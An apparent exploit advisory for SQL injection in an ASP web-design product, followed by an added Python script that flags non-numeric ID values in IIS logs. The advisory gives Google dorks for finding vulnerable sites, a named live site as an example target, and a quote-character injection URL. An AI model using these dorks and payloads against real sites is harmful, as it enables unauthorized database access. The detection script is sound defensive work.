############################################
# Exploit Title : BuAdegnteractive Web Design 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : buinteractive.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Version Information : 1.0 - Microsoft ASP.NET - IIS 6.0 + Windows Server Operating System
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018060020
############################################
BuAdegnteractive Web Design E-Commerce Social Media Digital Marketing SQL Injection Vulnerability
############################################
# Google Dork : intext:''Bu interactive''
# Google Dork : inurl:''/news.asp?ID='' site:oymaksan.com.tr
# Exploit : /news.asp?ID=[SQL Injection]
############################################
# Example Site => oymaksan.com.tr/news.asp?ID=25%27 => [ Proof of Concept for SQL Inj ] => archive.is/1X8m5
############################################
# SQL-DB Error =>
ADODB.Command error '800a0d5d'
Application uses a value of the wrong type for the current operation.
/includes/inc_main.asp, line 1683
############################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
############################################
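
Added example, not part of the original advisory: a detection check a site operator could run over IIS W3C logs to find requests where the ID parameter of /news.asp is not a plain integer, together with the HTTP status returned. The log lines, field selection and the function name suspicious_requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C log lines (not from the advisory); IPs are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2018-12-30 10:00:01 GET /news.asp ID=25 198.51.100.7 200
2018-12-30 10:00:05 GET /news.asp ID=25%27 198.51.100.7 500
2018-12-30 10:00:09 GET /News.asp id=25abc 198.51.100.7 200
2018-12-30 10:01:00 GET /default.asp - 203.0.113.9 200
2018-12-30 10:02:00 GET /news.asp - 203.0.113.9 200
"""

# A legitimate article ID is assumed to be a short run of decimal digits.
NUMERIC_ID = re.compile(r"[0-9]{1,9}")


def suspicious_requests(log_text, stem="/news.asp", param="id"):
    """Return records where `param` on `stem` is present but not a plain integer."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the lines that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        rec = dict(zip(fields, line.split()))
        # IIS paths and ASP parameter names are case-insensitive.
        if rec.get("cs-uri-stem", "").lower() != stem:
            continue
        query = rec.get("cs-uri-query", "-")
        if query == "-":  # IIS logs "-" when there is no query string
            continue
        # parse_qs URL-decodes the values (%27 becomes a single quote).
        parsed = parse_qs(query, keep_blank_values=True)
        params = {k.lower(): v for k, v in parsed.items()}
        for value in params.get(param, []):
            if not NUMERIC_ID.fullmatch(value):
                hits.append({
                    "time": rec.get("date", "") + " " + rec.get("time", ""),
                    "client": rec.get("c-ip", ""),
                    "value": value,
                    "status": rec.get("sc-status", ""),
                })
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A hit with status 500 indicates the malformed value reached the database layer and produced a server error like the one quoted in the advisory.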